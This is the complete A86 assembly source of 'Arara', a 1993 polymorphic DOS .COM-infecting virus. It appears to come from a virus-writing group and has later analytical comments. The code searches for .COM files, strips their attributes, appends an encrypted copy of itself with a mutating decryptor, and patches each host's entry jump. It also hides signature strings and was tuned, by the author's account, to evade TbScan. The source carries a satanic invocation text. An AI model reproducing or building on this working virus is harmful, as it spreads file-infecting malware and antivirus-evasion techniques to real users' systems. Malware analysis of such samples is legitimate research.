;
; [Arara] Virus
;
; Generated by [TVG]
;
; Minor modifications done to avoid heuristic detection by TbScan
;
; Cloaked with a minor polymorphic protection device
;
; Created on Monday November 11, 1993
;
; Written for compilation in A86 pd assembler
; (A86 syntax throughout: W/B size prefixes, LABEL[n][BP] addressing,
;  MOV seg,seg. It will not assemble unchanged under NASM or MASM.)
;
; This is not a major virus, but I want to see how they react in the Virus
; summary. Maybe they say it's from Bulgaria because of the language. Well,
; if you want me to write something (fairly neutral) about satanism for a mag
; then say so. I try to keep it interesting...
;
; John Tardy

; Entry of the dropper: a jump to MAIN followed by the infection-marker byte
; (garbled as '<27>' in this copy of the file). Infected hosts receive the
; same 4-byte header, built from JUMP near the end of the file.
        JMP MAIN
        DB '<27>'
; MAIN is the first byte that is copied into hosts (VIRLEN = $-MAIN). The
; CALL reads its own return address to obtain BP = (runtime offset of GETOFS)
; - (assembly-time offset of GETOFS); every reference into the body is
; written LABEL[BP] for that reason. The return address is only read, never
; popped: it is still on the stack when READY jumps into the host, where only
; AX is popped.
MAIN:   CALL GETOFS
GETOFS: MOV BP,SP
        MOV BP,SS:[BP]                  ; BP = return address = runtime offset of GETOFS
        PUSH AX                         ; host's entry AX, restored at READY
        SUB BP,GETOFS                   ; BP = relocation delta

; Run-time setup after the body has been decrypted. MAINVIR itself is not
; referenced anywhere in this file.
MAINVIR EQU $
        CALL RANDOMIZE                  ; step the decryptor-shape counters, pick a key
; Put the host's original first four bytes back at CS:100h (ES = CS in a
; .COM; STOSW assumes DF is clear). LEA DI,100H is just MOV DI,100h.
        MOV AX,[ORGPRG][BP]
        LEA DI,100H
        STOSW
        MOV AX,[ORGPRG][2][BP]
        STOSW
; Move the DTA to DS:0FD00h, high in the 64 KiB segment, so the directory
; search does not clobber the PSP; the matched file name then sits at
; 0FD1Eh (DTA + 1Eh), which the code below hard-codes.
        MOV AH,1AH
        MOV DX,0FD00H
        INT 21H
        CALL CHANGE                     ; unscramble the mask: '*.OCM' -> '*.COM'

; Find the first '*.COM' in the current directory (AH=4Eh, CX=0: normal
; attributes only). EXEFILE re-enters at SEARCH with AH=4Fh (FindNext); the
; DX/CX reloads are harmless for that call. No match: leave via READY.
        MOV AH,4EH
SEARCH: LEA DX,FILESPEC[BP]
        XOR CX,CX
        INT 21H
        JNC NOERROR
        JMP READY

; A candidate was found: save and clear its attributes, open it, save its
; time stamp, read its first 4 bytes and decide whether to infect it.
NOERROR: MOV AX,4300H                   ; get attributes of the file named at DTA+1Eh
        MOV DX,0FD1EH
        INT 21H
        PUSH CX                         ; original attributes, restored by CLOSE
        MOV AX,4301H                    ; clear all attributes (read-only included),
        XOR CX,CX                       ; presumably so the open below cannot fail on R/O
        INT 21H
        MOV AX,3D02H                    ; open read/write. CF is not checked: if the
        MOV DX,0FD1EH                   ; open fails the error code ends up in BX
        INT 21H                         ; and is used as the handle
        XCHG AX,BX                      ; BX = handle
        MOV AX,5700H                    ; get file time (CX) / date (DX)
        INT 21H
        PUSH CX                         ; time    - both restored by CLOSE
        PUSH DX                         ; date
        MOV AH,3FH                      ; read the first 4 bytes into ORGPRG
        LEA DX,ORGPRG[BP]
        MOV CX,4
        INT 21H
; Skip EXE images and already-infected files. The word is compared against
; the complement of 'MZ'/'ZM' (5A4Dh ^ 0FFFFh = 0A5B2h, 4D5Ah ^ 0FFFFh =
; 0B2A5h) so the plain signature does not appear in the body. An infected
; file carries the marker byte at offset 3 (see JUMP).
        MOV CX,W ORGPRG[BP]
        XOR CX,0FFFFH
        CMP CX,0B2A5H
        JE EXEFILE
        CMP CX,0A5B2H
        JE EXEFILE
        CMP B ORGPRG[BP][3],'<27>'
        JE EXEFILE

; Infect: turn the host size into the JMP displacement, build decryptor +
; encrypted body in the scratch area after START, append that, then overwrite
; the host's first 4 bytes with JUMP. Exactly one file per run.
        MOV AX,4202H                    ; seek to end: AX = low word of the size
        XOR CX,CX                       ; (DX is ignored and there is no size check,
        CWD                             ; so a host near 64 KiB would overflow the segment)
        INT 21H
        SUB AX,3
        MOV JUMP[1][BP],AX              ; E9 rel16: 100h + 3 + (size-3) = 100h + size
        PUSH BX                         ; handle
        PUSH AX                         ; size - 3
        CALL CHANGE                     ; back to '*.OCM' before the body is copied
        MOV DS,CS                       ; A86 accepts seg-to-seg MOV; no such 8086 opcode
                                        ; exists, so the assembler presumably expands it
        LEA SI,MAIN[BP]                 ; source: the live body
        MOV CX,VIRLEN
        MOV ES,CS
        LEA DI,START[BP]                ; destination: scratch area past the body
        POP DX
        ADD DX,103H                     ; DX = 100h + size = load offset of the appended code
        MOV AX,3                        ; garbage-length mask for INSERTGARBAGE (0..3 bytes)

        CALL ENCRYPT                    ; returns CX = bytes to write

        POP BX                          ; handle
        MOV AH,40H                      ; append decryptor + encrypted body
        MOV DS,CS                       ; (write result is not checked)
        LEA DX,START[BP]
        INT 21H

        MOV AX,4200H                    ; seek to offset 0
        XOR CX,CX
        CWD
        INT 21H
        MOV AH,40H                      ; overwrite the header with JMP + marker
        LEA DX,JUMP[BP]
        MOV CX,4
        INT 21H
        CALL CLOSE
        JMP READY

; Not a target (EXE header or already marked): restore its time stamp and
; attributes, close it and continue with FindNext.
EXEFILE: CALL CLOSE
        MOV AH,4FH
        JMP SEARCH

; Hand control to the restored host. READY and ERROR name the same address;
; nothing in this file jumps to ERROR.
READY EQU $
ERROR:  MOV AH,1AH                      ; DTA back to the PSP default at 80h
        MOV DX,80H
        INT 21H
        MOV DS,CS
        POP AX                          ; host's entry AX (pushed in GETOFS)
        MOV BX,0FEFFH                   ; BX = 100h, formed by XOR so the literal
        XOR BX,0FFFFH                   ; "MOV BX,100h / JMP BX" pattern is absent
        JMP BX                          ; SP is still 2 below what DOS set: the
                                        ; CALL GETOFS return address was never popped

; Restore the file's time/date and attributes and close it. Expects the stack
; to hold, top first: return address, date, time, attributes - exactly what
; NOERROR pushed. The return address is parked in SI and pushed back for RET.
CLOSE:  POP SI                          ; return address
        POP DX                          ; date
        POP CX                          ; time
        MOV AX,5700H                    ; AX = 5701h (set time/date), built with INC
        INC AX
        INT 21H
        MOV AH,3EH                      ; close the handle in BX
        INT 21H
        POP CX                          ; original attributes
        MOV AX,4300H                    ; AX = 4301h (set attributes)
        INC AX
        MOV DX,0FD1EH                   ; file name in the relocated DTA
        INT 21H
        MOV DS,CS
        MOV ES,CS
        PUSH SI
        RET

        DB '[ARARA]'                    ; name string carried in the body; never executed
; Swap the two bytes at FILESPEC+2, i.e. '*.OCM' <-> '*.COM'. The mask is
; stored scrambled and is only unscrambled around the directory search.
CHANGE: MOV AX,W WEXL[BP]
        XCHG AL,AH
        MOV W WEXL[BP],AX
        RET

;---------------------------------------------------------------------------
;
; Encryption engine
;
;---------------------------------------------------------------------------

; Step the seven decryptor-shape counters in MT: every counter is incremented
; by one, then each counter that has reached its MTMAX limit is reset to 0.
; The shapes therefore follow a fixed sequence from one generation to the
; next; only the key and the garbage bytes depend on the clock. Then pick the
; key from the BIOS tick counter at 0000:046Ch, spinning until its low byte
; is non-zero (a zero key would leave the body in clear for the XOR case).
; CHECKIT is not referenced anywhere in this file.
RANDOMIZE: MOV CX,MTLEN
INCREASE: MOV SI,CX
        INC B MT[SI][-1][BP]
        LOOP INCREASE
CHECKIT: MOV CX,MTMAXLEN
CHECKVAL: MOV SI,CX
        MOV AH,MT[SI][-1][BP]
        MOV AL,MTMAX[SI][-1][BP]
        CMP AH,AL
        JB GOODVAL
        MOV B MT[SI][-1][BP],0
GOODVAL: LOOP CHECKVAL
        XOR AX,AX
        MOV DS,AX                       ; DS = 0 to reach the BIOS data area
NOTZERO: MOV AL,B DS:[046CH]
        OR AL,AL
        JZ NOTZERO
        MOV DS,CS
        MOV ENCRYPTVAL[BP],AL
        RET

; Scratch words ENCRYPT uses while it builds a decryptor (all accessed [BP]):
DUMMY1 DW 0 ; offset mov bx,si,di - output position of the pointer imm16, patched last
DUMMY2 DW 0 ; offset loop - output position of the loop top, target of the rel8
CALNEWCX DW 0 ; output position where the decryptor starts (initial ES:DI)

;---------------------------------------------------------------------------
; ENCRYPT - emit a mutated decryptor followed by the encrypted body.
;
; In:   DS:SI = body to copy (MAIN), CX = its length (VIRLEN)
;       ES:DI = output buffer (START)
;       DX    = offset the buffer will have inside the host once loaded
;               (100h + host size, see the caller)
;       AX    = garbage-length mask, stored into INSERTGARBAGE's AND immediate
; Out:  ES:[CALNEWCX..DI) = decryptor | encrypted body, CX = total length.
;       DS and SI are restored; AX, BX, DI and flags are clobbered.
;
; Shape of the generated decryptor. MT[0..5] select the variants from the
; tables that follow INSERTGARBAGE; "garbage" = 0..mask do-nothing bytes.
;
;       garbage
;       MOV   r1,imm16          VAL2T[MT0], r1 in AX/BX/DX/BP. imm16 is the
;                               length PLUS the opcode byte (AX still holds
;                               the XLAT result when COUNTLOOP is added), so
;                               the loop runs 0B8h-0BDh iterations past the
;                               body; whether that is intended is not stated
;       garbage
;       op    CX,r1             VAL3SUB[MT1] + VAL3T[4*MT1+MT0]: MOV or XCHG,
;                               or XOR/ADD/OR - those only give the right
;                               count when CX is already 0 at host entry
;       garbage
;       MOV   r2,imm16          VAL1T[MT2], r2 in BX/SI/DI; imm16 is patched
;                               afterwards (DUMMY1) to DX + decryptor length
;       garbage
; top:  XOR/ADD/SUB BYTE [r2],key   VAL4T[MT3] opcode, VAL5T[4*MT4+MT2]
;                               ModRM, key = ENCRYPTVAL
;       garbage
;       INC   r2                VAL6T[MT2]
;       LOOP/LOOPNZ top         VAL7T[MT5]; rel8 = -(DI - DUMMY2) - 1
;       <body, transformed by CODEIT with the inverse of the decrypt op>
;---------------------------------------------------------------------------
ENCRYPT: PUSH DS
        PUSH SI
        PUSH CX

        MOV AMOUNT[BP],AX               ; patch the garbage-length mask (self-modifying)

        MOV COUNTLOOP[BP],CX

        MOV CALNEWCX[BP],DI             ; remember where the output starts

        LEA SI,MT[BP]                   ; SI now walks the MT counters (DS = CS)

        CALL INSERTGARBAGE
        XOR AX,AX                       ; AH stays 0 through the XLATs below

        LODSB                           ; MT[0]
        PUSH AX
        LEA BX,VAL2T[BP]
        CALL USETABLE                   ; MOV r1,
        ADD AX,W [COUNTLOOP][BP]        ; imm16 = opcode byte + length (see header)
        STOSW
        LODSB                           ; MT[1]
        PUSH AX
        CALL INSERTGARBAGE
        LEA BX,VAL3SUB[BP]
        CALL USETABLE                   ; opcode of "op CX,r1"
        POP AX                          ; MT[1]
        SHL AX,2
        POP BX                          ; MT[0]
        ADD AX,BX                       ; row MT[1], column MT[0]
        LEA BX,VAL3T[BP]
        CALL USETABLE                   ; its ModRM
        CALL INSERTGARBAGE

        LODSB                           ; MT[2], pushed twice: ModRM column and INC
        PUSH AX
        PUSH AX
        LEA BX,VAL1T[BP]
        CALL USETABLE                   ; MOV r2,
        MOV DUMMY1[BP],DI               ; the imm16 goes here, patched at the end
        STOSW                           ; placeholder
        CALL INSERTGARBAGE

        MOV DUMMY2[BP],DI               ; loop top
        LODSB                           ; MT[3]
        LEA BX,VAL4T[BP]
        CALL USETABLE                   ; 80h / 82h
        POP BX                          ; MT[2]
        LODSB                           ; MT[4] = decrypt operation
        MOV FUNCTION[BP],AL
        SHL AX,2
        ADD AX,BX                       ; row MT[4], column MT[2]
        LEA BX,VAL5T[BP]
        CALL USETABLE                   ; ModRM: op BYTE [r2],imm8
        MOV AL,B [ENCRYPTVAL][BP]
        STOSB                           ; the key
        CALL INSERTGARBAGE
        POP AX                          ; MT[2]
        LEA BX,VAL6T[BP]
        CALL USETABLE                   ; INC r2
        LODSB                           ; MT[5]
        LEA BX,VAL7T[BP]
        CALL USETABLE                   ; LOOP / LOOPNZ
        MOV AX,DI
        MOV BX,DUMMY2[BP]
        SUB AX,BX                       ; distance from loop top to the rel8 byte
        NOT AX                          ; = -(distance + 1): back to top from the next byte
        STOSB
        PUSH DI
        MOV AX,CALNEWCX[BP]
        SUB DI,AX                       ; decryptor length so far
        ADD DI,DX                       ; + load offset = where the body will sit
        MOV AX,DI
        MOV DI,DUMMY1[BP]
        STOSW                           ; patch the pointer immediate
        POP DI

        POP CX                          ; length
        POP SI                          ; body
        POP DS

; Encrypt DS:SI -> ES:DI, CX bytes, with the inverse of the decryptor's op:
; FUNCTION 0 = XOR (decryptor XOR), 1 = SUB (decryptor ADD), 2 = ADD
; (decryptor SUB). Afterwards CX = total bytes emitted since CALNEWCX.
CODEIT: LODSB
        CMP B FUNCTION[BP],0
        JNE WHATELSE1
        XOR AL,ENCRYPTVAL[BP]
        JMP NOELSE
WHATELSE1: CMP B FUNCTION[BP],1
        JNE WHATELSE2
        SUB AL,ENCRYPTVAL[BP]
        JMP NOELSE
WHATELSE2: ADD AL,ENCRYPTVAL[BP]
NOELSE: STOSB
        LOOP CODEIT
        MOV CX,CALNEWCX[BP]
        SUB DI,CX
        MOV CX,DI                       ; decryptor + body length
        RET

; AL = DS:[BX + AL] (XLAT on the table at BX), then emit AL at ES:DI.
; AH is left untouched, which the callers rely on (they keep AH = 0 so the
; value can be used as a word index afterwards).
USETABLE:
        XLAT
        STOSB
        RET

; Emit 0..N do-nothing bytes from RANDOMCODE at ES:DI, where N is the mask
; ENCRYPT stores into the AND immediate at AMOUNT (the caller passes 3).
; The count and the table indices are derived from the BIOS tick counter
; mixed with DI, SI, BP, CX and a word read near the output position.
; Preserves DS, SI, AX, CX; clobbers BX and flags; advances DI.
; Relies on the assembler emitting the 3-byte "AND AX,imm16" (25h) form so
; that AMOUNT = $-2 really is the immediate word.
INSERTGARBAGE: PUSH DS
        PUSH SI
        PUSH AX
        PUSH CX
        PUSH DS
        PUSH SI
        XOR AX,AX
        MOV DS,AX                       ; DS = 0 for the BIOS data area
        MOV AX,WORD PTR DS:[046CH]      ; tick counter
        ADD AX,DI
        SUB AX,SI
        ADD AX,BP
        ADD AX,WORD PTR CS:[DI][BP]
        ADD AL,AH
        ADD AX,CX
        AND AX,02H                      ; immediate is self-modified by ENCRYPT
AMOUNT EQU $-2
        MOV CX,AX                       ; number of garbage bytes
        AND AX,7H                       ; first table index; only entries 0-7 are reachable
        POP SI
        POP DS
        CMP CX,0
        JE NOGARBAGE
INSERT: LEA BX,RANDOMCODE[BP]
        CALL USETABLE
        ADD AX,DI                       ; next index from the running state
        ADD AX,SI
        ADD AX,WORD PTR CS:[DI][BP]
        AND AX,7
        LOOP INSERT
NOGARBAGE: POP CX
        POP AX
        POP SI
        POP DS
        RET

; Decryptor-shape counters. MTMAX[i] is the limit at which MT[i] wraps to 0
; (RANDOMIZE). The "MT n" labels in the original comments skip 3; by
; position the bytes are MT[0]..MT[6]. ENCRYPT reads MT[0]..MT[5] in order
; with six LODSBs; MT[6] is stepped but never read.
MTMAX DB 4 ; MT 0 - VAL2T index: count register AX/BX/DX/BP (also VAL3T column)
        DB 10 ; MT 1 - VAL3SUB index / VAL3T row: how the count reaches CX
        DB 3 ; MT 2 - VAL1T/VAL6T index: pointer register BX/SI/DI (also VAL5T column)
        DB 2 ; MT 4 - VAL4T index: 80h or 82h opcode of the decrypt instruction
        DB 3 ; MT 5 - FUNCTION and VAL5T row: XOR/ADD/SUB
        DB 2 ; MT 6 - VAL7T index: LOOPNZ or LOOP
        DB 6 ; MT 7 - not consumed by ENCRYPT
MTMAXLEN EQU $-MTMAX

; Current counter values; they travel with the body, so each generation
; continues the sequence.
MT DB 0 ; MT 0
        DB 0 ; MT 1
        DB 0 ; MT 2
        DB 0 ; MT 4
        DB 0 ; MT 5
        DB 0 ; MT 6
        DB 0 ; MT 7
MTLEN EQU $-MT

; Offset of the encrypted part - declared but not referenced anywhere here
ENCOFS DW 0

; Body length (VIRLEN) that ENCRYPT adds into the decryptor's count immediate
COUNTLOOP DW 0

; Encryption key: low byte of the BIOS tick count, never 0 (RANDOMIZE)
ENCRYPTVAL DB 0

; Operation the generated DEcryptor performs on each byte; CODEIT applies the
; inverse when encrypting: 0 = XOR (self-inverse), 1 = ADD (CODEIT
; subtracts), 2 = SUB (CODEIT adds). The value is MT[4] at generation time.
FUNCTION DB 0 ; 0=xor, 1=add, 2=sub (xchange in encr)

; Opcode fragments the decryptor is assembled from. The "MT n" labels in the
; original comments do not match the position ENCRYPT actually reads; the
; index ENCRYPT uses and the decoded instruction are given below. In the
; two-dimensional tables "V" is the row index and "H" the column index.

; Indexed by MT[2]: MOV r16,imm16 for the pointer register
VAL1T DB 0BBH,0BEH,0BFH ; Mov Bx,Si,Di

; Indexed by MT[0]: MOV r16,imm16 for the count register
VAL2T DB 0B8H,0BBH,0BAH,0BDH ; Mov Ax,Bx,Dx,Bp

; Indexed by MT[1] (V): first opcode byte of "count -> CX".
; 89h MOV r/m,r | 87h XCHG | 87h XCHG | 31h XOR r/m,r | 01h ADD r/m,r | 09h OR r/m,r
VAL3SUB DB 089H, 087H, 087H, 031H, 001H, 009H

; 8Bh MOV r,r/m | 33h XOR r,r/m | 03h ADD r,r/m | 0Bh OR r,r/m  ("NIEUW" = new)
        DB 08BH, 033H, 003H, 00BH ; NIEUW

; Row = MT[1], column = MT[0] (H): the matching ModRM byte, so the result is
; <op> CX,AX / CX,BX / CX,DX / CX,BP. Rows 3-5 and 7-9 (XOR/ADD/OR) compute
; CX := CX op reg and therefore only load the intended count when CX is
; already 0 at host entry - nothing in this file establishes that.
VAL3T DB 0C1H,0D9H,0D1H,0E9H ; Mov Ax,Bx,Dx,Bp -> Cx
        DB 0C1H,0CBH,0CAH,0CDH ; Xchg Ax,Bx,Dx,Bp -> Cx
        DB 0C1H,0D9H,0D1H,0E9H ; Xchg Ax,Bx,Dx,Bp <- Cx
        DB 0C1H,0D9H,0D1H,0E9H ; Xor Ax,Bx,Dx,Bp -> Cx
        DB 0C1H,0D9H,0D1H,0E9H ; Add Ax,Bx,Dx,Bp -> Cx
        DB 0C1H,0D9H,0D1H,0E9H ; Or Ax,Bx,Dx,Bp -> Cx

; reg = CX, r/m = AX/BX/DX/BP, for the 8Bh/33h/03h/0Bh forms above
        DB 0C8H,0CBH,0CAH,0CDH ; NIEUW
        DB 0C8H,0CBH,0CAH,0CDH ;
        DB 0C8H,0CBH,0CAH,0CDH ;
        DB 0C8H,0CBH,0CAH,0CDH ;

; Indexed by MT[3]: opcode of the decrypt instruction (group 1 r/m8,imm8).
; 82h is the 16-bit-mode alias of 80h, so both give the same instruction.
VAL4T DB 080H,082H ; 00 / 0000

; Row = MT[4] (V, = FUNCTION), column = MT[2] (H): ModRM for
; XOR/ADD/SUB BYTE [BX]/[SI]/[DI],imm8. The fourth column repeats [BX] and
; is never selected because MT[2] < 3.
VAL5T DB 037H,034H,035H,037H ; Xor Bx,Si,Di,bx
        DB 007H,004H,005H,007H ; Add Bx,Si,Di,bx
        DB 02FH,02CH,02DH,02FH ; Sub Bx,Si,Di,bx

; Indexed by MT[2]: INC of the pointer register
VAL6T DB 043H,046H,047H ; Inc Bx,Si,Di

; Indexed by MT[5]: E0h LOOPNZ / E2h LOOP. Equivalent here because the INC
; just before leaves ZF clear unless the pointer wrapped to 0.
VAL7T DB 0E0H,0E2H ; Loop Equal Functions

; Garbage bytes for INSERTGARBAGE, index 0-7 (the index is masked with 7, so
; the ninth byte is never used): CLD, CLC, NOP, STC, CMC, INT 3, STI, CS:
; prefix, CMC. Because of the INT 3 a generated decryptor may contain a
; breakpoint instruction; the CS: prefix attaches to whatever instruction
; follows it, which changes nothing while CS = DS in a .COM.
RANDOMCODE DB 0FCH,0F8H,090H,0F9H,0F5H ; Random code
        DB 0CCH,0FBH,02EH,0F5H

; Search mask, stored byte-swapped as '*.OCM'; CHANGE turns it into '*.COM'
; for the directory search and back again before the body is copied.
FILESPEC DB '*.OCM',0
WEXL EQU FILESPEC+2                     ; the 'OC' word that CHANGE swaps
; Replacement header written over the host's first 4 bytes:
JUMP DB 0E9H                            ; JMP near ...
        DW 0                            ; ... rel16 = host size - 3, patched before the write
        DB '<27>'                       ; infection marker (garbled in this copy); NOERROR
                                        ; compares byte 3 of a candidate against it
; The host's original first 4 bytes: read before infection, put back at
; CS:100h at run time. In the dropper itself they are INT 20h + 'AR', so the
; dropper terminates once it jumps to 100h.
ORGPRG DB 0CDH,020H,'AR'

;
; The Eighteenth Enochian Key opens the gates of Hell and casts up Lucifer
; and his blessing.
;
; Enochian
; Text carried inside the body (it counts towards VIRLEN); no code in this
; file references or displays it.
        DB 13,10,'ILASA MICALAZODA OLAPIRETA IALPEREJI BELIORE: DAS ODO BUSADIRE OIAD OUOARESA'
        DB 13,10,'CAOSAGO: CASAREMEJI LAIADA ERANU BERINUTASA CAFAFAME DAS IVEMEDA AQOSO ADOHO'
        DB 13,10,'MOZ, OD MAOFASA. BOLAPE COMO BELIORETA PAMEBETA. ZODACARE OD ZODAMERANU! ODO'
        DB 13,10,'CICALE QAA. ZODOREJE, LAPE ZODIREDO NOCO MADA, HOATHAHE SAITAN!'
; English
; O thou mighty light and burning flame of comfort!, that unveilest the glory
; of Satan to the center of the Earth; in whom the great secrets of truth
; have their abiding; that is called in thy kingdom: "strength through joy,"
; and is not to be measured. Be thou a window of comfort unto me. Move there-
; fore, and appear! Open the mysteries of your creation! Be friendly unto me,
; for I am the same!, the true worshipper of the highest end ineffable King
; of Hell!
; End of the part copied into hosts. START is the scratch area beyond the
; image where ENCRYPT builds decryptor + encrypted copy before the file
; write; VIRLEN is the byte count from MAIN to here.
START EQU $

VIRLEN EQU $-MAIN

; ---------------------------------------------------------------------------
; >> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <<
; >> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <<
; ---------------------------------------------------------------------------